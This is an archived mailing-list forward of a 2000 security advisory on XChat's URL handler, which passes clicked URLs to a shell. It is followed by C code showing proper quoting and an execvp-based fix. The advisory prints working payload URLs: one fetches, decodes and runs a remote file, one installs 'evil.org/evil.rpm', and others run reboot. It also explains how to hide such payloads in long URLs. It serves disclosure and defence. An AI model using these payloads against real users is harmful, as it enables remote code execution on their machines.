----- Forwarded message from zenith parsec <[EMAIL PROTECTED]> -----

> From: zenith parsec <[EMAIL PROTECTED]>
> Reply-To: zenith parsec <[EMAIL PROTECTED]>
> X-Originating-IP: [209.77.156.55]
> Date: Thu, 17 Aug 2000 11:19:40 -0000
> To: [EMAIL PROTECTED]
> Subject: XChat URL handler vulnerability
>
> **********************************************************************
> Email was sent to [EMAIL PROTECTED] (the author of xchat) and after over a week,
> I have received no reply. So here it is... the advisory.
> **********************************************************************
>
> ***************
> ***zen-parse*** - blinking since 1992 (or mebe earlier)
> ***************
>
>  X   X    CC    H   H    AA    TTTTT
>   X X    C  C   H   H   A  A     T
>    X     C      HHHH    AAAA     T
>   X X    C  C   H   H   A  A     T
>  X   X    CC    H   H   A  A     T
>
> Hole: backticked commands embedded in URLs vulnerability.
>
> ***********************************
> * If you are lazy, read this part *
> ***********************************
>
> Just to show what i mean about the possible danger, start Netscape and enter
> in xchat, (in a channel or query window) the following URL.
>
> >http://this.should.work.com/cgi-bin/search.cgi?q='`lynx${IFS}-dump${IFS}http://homepages.ihug.co.nz/~Sneuro/thing|uudecode;./thingee`'
>
> Right click on it, and select the Netscape (Existing) or Netscape (New Window)
> option.
>
> Wait until the URL loads.
> In a shell on your machine type
>
> tail -2 ~/.bash_profile
>
> echo You've been hax0red
> echo --zen
>
> (oops... should've been You\'ve been hax0red, but u get the idea ;])
> Lucky it wasn't a script that was well written, and designed to
> use script kiddie stuff to hack root or something, eh?
> **********************************************************************
> **********************************************************************
>
> For the non-lazy and the lazy who were impressed by the quick demo...
>
> <advisory>
> **********************************************************************
> X-Chat has a feature which allows execution of code remotely
> with the permissions of the user running it. (affects at least
> versions <1.4.2, probably all versions.)
> **********************************************************************
>
> The hole is in the URL Handler section:
> Netscape (Existing)
> causes XChat to run the command
> netscape -remote 'openURL(%s)'
> where the %s is replaced by the selected URL
> eg: http://homepages.ihug.co.nz/~Sneuro/
> causes the command
> netscape -remote 'openURL(http://homepages.ihug.co.nz/~Sneuro/)'
> which opens that page.
> Netscape (Run New)
> causes XChat to run the command
> netscape %s
> and so on.
>
> **************************
> *        The Hole        *
> **************************
>
> Backticking and shell expansion. Imagine if someone types:
>
> l00k @ d15 k3w1 w@r3z 5173! http://www.altavista.com/?x=`date`y='`date`'
>
>
> with the (Existing) or (New Window) options and others that
> use 'openURL(%s)' type commands to start the program, you get:
>
> netscape -remote 'openURL(http://www.altavista.com/?x=`date`y='`date`')'
>
> count the 's and u will see that at the 2nd `date` they are closed,
> and then reopened, so that `date` isn't escaped anymore... leaving it free to
> run, which it does.
>
> With the (Run New) type commands (that is command %s with no 's around
> the %s) you get:
>
> netscape http://www.altavista.com/?x=`date`y='`date`'
>
> which has the 1st `date` unescaped (no 's around it) and so it executes.
>
> In real life though, it's unlikely anyone would click on a URL like
>
> http://`reboot`/'`reboot`'
>
> though. Still, not all that useful, I hear you tell me. Well, URLs can get
> pretty long. For example, a cgi-bin call to something can get quite long.
>
> >http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2bbacktick+%2bexploit&stq=10
>
> compare that to:
>
> >http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2b`reboot`+%2bexploit&stq=10&filter='`reboot`'&user=b0dee0132&split=1
>
> quick glance... nothing wrong with it.
>
> well, u seem to have a limitation, in that putting spaces in doesn't
> work, nor does redirection.
>
> well, u can put spaces in. The $IFS variable is probably set.
> And who needs redirection, when u can do this:
>
> http://www.altavista.com/?'"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"'
>
> (For (Existing) or (New Window))
>
> http://www.altavista.com/?"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"
>
> (for (Run New))
> (not hidden in any way, but it could be obfuscated like the earlier example.)
> (Also only works if someone is running as root, (which is a *STUPID* idea
> anyway) but the 1st example should've shown you a method around this)
>
> anyway... the possibilities are endless ;)
>
> -- zen-parse
> </advisory>
>
> ps:
> greets to:
> lamagra, omega, lockdown, grue, Mega, possem,
> some other people i can't remember, the rest of #roothat,
> and mebe even #social and umm... u, if I know u.
>
> Content-Description: x-chat-url-executionything.txt

----- End forwarded message -----

--------------------------------------------------------------------------
To unsubscribe, send an email to [EMAIL PROTECTED]
Archive information at http://www.linux.or.id/milis.php3
The list administrators can be reached at [EMAIL PROTECTED]
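The root cause the advisory describes is a URL interpolated into a shell command string (`netscape -remote 'openURL(%s)'` or `netscape %s`), so a single quote closes the quoted region and a backtick or `${IFS}` is interpreted by the shell. The C below is an added example written for this page, not X-Chat's code: it shows the legacy string for comparison, then two fixes, proper single-quote escaping of the whole argument and, preferably, passing the URL as `argv[1]` through `execvp()` so no shell ever parses it, plus an allow-list check as defence in depth. The function names, the allow-list and the use of `/bin/echo` as a stand-in browser are this example's own assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Allow-list for a URL handed to an external program: the RFC 2396
 * unreserved/reserved characters minus the ones that can break out of a
 * single- or double-quoted shell argument (backtick, ' " $ \ and any
 * whitespace or control byte). Parentheses are excluded too, since the
 * "-remote 'openURL(%s)'" wrapper uses them as delimiters. Assumption of
 * this example, not X-Chat's list. */
static const char URL_SAFE[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
    "-._~:/?#[]@!&=+,;%*";

/* 1 if url is non-empty and every byte is on the allow-list, else 0. */
int url_is_shell_safe(const char *url)
{
    if (url == NULL || url[0] == '\0')
        return 0;
    return url[strspn(url, URL_SAFE)] == '\0';
}

/* The command line the advisory describes: the raw URL is dropped into the
 * single-quoted argument. Kept only for comparison; never pass to system(). */
int build_legacy_command(const char *url, char *out, size_t n)
{
    int len = snprintf(out, n, "netscape -remote 'openURL(%s)'", url);
    return (len < 0 || (size_t)len >= n) ? -1 : len;
}

/* Wrap s in single quotes for /bin/sh, rewriting every embedded ' as '\''
 * so the quoted region can never be closed early. Returns the length
 * written, or -1 if out (n bytes) is too small. */
int shell_single_quote(const char *s, char *out, size_t n)
{
    size_t o = 0;
    if (n < 3)
        return -1;
    out[o++] = '\'';
    for (; *s != '\0'; s++) {
        const char *rep = (*s == '\'') ? "'\\''" : NULL;
        size_t need = rep ? strlen(rep) : 1;
        if (o + need + 2 > n)          /* keep room for closing ' and NUL */
            return -1;
        if (rep) { memcpy(out + o, rep, need); o += need; }
        else       out[o++] = *s;
    }
    out[o++] = '\'';
    out[o] = '\0';
    return (int)o;
}

/* Fix 1: if a shell string must be built, quote the whole openURL(...)
 * argument rather than interpolating the raw URL inside fixed quotes. */
int build_quoted_command(const char *url, char *out, size_t n)
{
    char arg[1024], q[2048];
    int len;
    if (snprintf(arg, sizeof arg, "openURL(%s)", url) >= (int)sizeof arg)
        return -1;
    if (shell_single_quote(arg, q, sizeof q) < 0)
        return -1;
    len = snprintf(out, n, "netscape -remote %s", q);
    return (len < 0 || (size_t)len >= n) ? -1 : len;
}

/* Fix 2 (preferred): hand the URL to prog as argv[1] via execvp(). No shell
 * parses it, so backticks, quotes and ${IFS} are ordinary bytes. The child's
 * stdout is read into out (n bytes incl. NUL); returns its exit status or -1. */
int run_without_shell(const char *prog, const char *url, char *out, size_t n)
{
    int fd[2], status;
    size_t got = 0;
    ssize_t r;
    pid_t pid;
    if (pipe(fd) != 0 || (pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        char *argv[3] = { (char *)prog, (char *)url, NULL };
        dup2(fd[1], STDOUT_FILENO);
        close(fd[0]); close(fd[1]);
        execvp(prog, argv);
        _exit(127);
    }
    close(fd[1]);
    while (got + 1 < n && (r = read(fd[0], out + got, n - 1 - got)) > 0)
        got += (size_t)r;
    out[got] = '\0';
    close(fd[0]);
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Demo: run /bin/echo in place of a browser and check the payload URL comes
 * back verbatim (plus echo's newline), i.e. nothing in it was expanded. */
int exec_preserves_url(const char *url)
{
    char out[512], want[512];
    if (run_without_shell("/bin/echo", url, out, sizeof out) != 0)
        return 0;
    snprintf(want, sizeof want, "%s\n", url);
    return strcmp(out, want) == 0;
}

int main(void)
{
    /* Constructed URL in the shape the advisory shows. */
    const char *url = "http://www.altavista.com/?x=`date`y='`date`'";
    char cmd[512];
    printf("allow-list: %s\n", url_is_shell_safe(url) ? "ok" : "rejected");
    build_legacy_command(url, cmd, sizeof cmd);
    printf("legacy    : %s\n", cmd);
    build_quoted_command(url, cmd, sizeof cmd);
    printf("quoted    : %s\n", cmd);
    printf("execvp    : %s\n", exec_preserves_url(url) ? "URL intact" : "FAILED");
    return 0;
}
```

Comparing the legacy and quoted lines in the output shows where the advisory's second `date` escapes: the fixed `'...'` around `openURL(%s)` are closed by the attacker's own quote, whereas `shell_single_quote()` turns that quote into `'\''` so the argument stays one token. The `execvp()` path sidesteps the problem entirely and is what a URL handler should use; the allow-list only catches the quote-breaking characters and is not a substitute for it.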
